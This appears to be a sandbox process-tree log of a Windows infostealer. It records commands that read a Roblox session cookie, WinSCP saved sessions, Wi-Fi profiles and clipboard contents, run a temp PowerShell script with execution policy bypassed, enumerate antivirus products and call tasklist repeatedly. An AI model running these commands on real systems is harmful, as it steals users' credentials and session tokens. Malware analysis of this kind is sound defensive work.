C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""
2⤵
PID:8024

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"
3⤵
PID:7816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}""
2⤵
PID:5464

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}"
3⤵
PID:5796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}""
2⤵
PID:8856

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}"
3⤵
PID:7524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}""
2⤵
PID:8044

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}"
3⤵
PID:1984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""
2⤵
PID:9492

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
3⤵
PID:10988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""
2⤵
PID:10788

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
3⤵
PID:9276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""
2⤵
PID:6828

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"
3⤵
PID:2180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}""
2⤵
PID:7732

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}"
3⤵
PID:5260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}""
2⤵
PID:9788

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}"
3⤵
PID:11044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}""
2⤵
PID:8548

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}"
3⤵
PID:3652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""
2⤵
PID:10936

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"
3⤵
PID:7024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}""
2⤵
PID:6008

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}"
3⤵
PID:5924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""
2⤵
PID:2316

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"
3⤵
PID:9924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}""
2⤵
PID:532

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}"
3⤵
PID:6456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}""
2⤵
PID:11060

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}"
3⤵
PID:11204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\tXskVTVfs6mD_tezmp.ps1""
2⤵
PID:10156

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\tXskVTVfs6mD_tezmp.ps1"
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:6216

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:6332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:10068

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:10324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:7228

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:10356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:8232

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:10252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3376

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:10296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:6428

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:5864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4336

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:9432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3212

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:9964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:9804

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:9652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:9172

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:9756

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:5956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:8996

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:9416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:11164

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:11116

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:4104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:9516

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:8016

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:10320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:10144

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:11112

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:6220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:7608

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:9212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:8308

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:5180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:11248

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:7820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:8776

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:9536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:9676

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:6096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:8620

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:8300

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:6176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:11092

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:9576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4252

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:6076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:7028

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:5664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:6600

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:8536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:7040

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:9084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:8012

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:10840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:5516

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:2712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:6668

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:10712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:5020

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:6336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4332

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:7160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:10360

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:10328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:812

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:7304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:6156

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:9268

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:5604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:2348

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:8916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:220

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3080

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:3404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:6896

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:9448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:11108

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:5696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:11084

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:6888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:11100

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:6004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:8080

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:9768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:8936

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:5668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:8740

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:5520

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:4372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4900

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:7804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:9660

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:7716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:8624

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:3152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:8692

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:8412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:6000

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:5244

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:5344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:6740

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:6916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:2980

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:9936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:6472

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:4364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4268

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:6584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:9176

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:10852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:7208

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:7964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:6228

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2400

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:10816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:5352

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:5476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:5556

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:6988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:9420

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:7892

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:6520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:9592

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:6420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4968

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:5676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:8768

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:6204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4432

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:6280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:5640

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:4356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:5928

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:3136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:5276

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:9412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:8268

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:8808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:6944

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:8120

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:7960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:5964

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:9016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3464

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:1064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:6104

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:6620

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:9596

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:6188

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:10344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:6880

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4168

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:8432

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:10808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:7088

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:6764

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:6048

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:2168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:7636

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:9824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:9400

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:4248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:8680

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:10396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:7596

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:5372

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:10312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3168

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:1772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\elYi6AJSLLKN.vbs"
2⤵
PID:7052

C:\Windows\system32\cscript.exe
cscript C:\Users\Admin\AppData\Roaming\elYi6AJSLLKN.vbs
3⤵
PID:9664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "mullvad account get"
2⤵
PID:2680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace "root\\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { "262144" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "262160" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "266240" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "266256" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "393216" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "393232" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "393488" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "397312" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "397328" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "397584" { $defstatus = "Out of date"; $rtstatus = "Enabled" } default { $defstatus = "Unknown"; $rtstatus = "Unknown" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct ""
2⤵
PID:6568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "function Get-AntiVirusProduct {
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:8608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
2⤵
PID:8964

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:6752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"
2⤵
PID:9092

C:\Windows\system32\netsh.exe
netsh wlan show profile
3⤵
PID:10256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""
2⤵
PID:5724

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
3⤵
PID:2892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"
2⤵
PID:6732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2756

C:\Windows\system32\cmd.exe
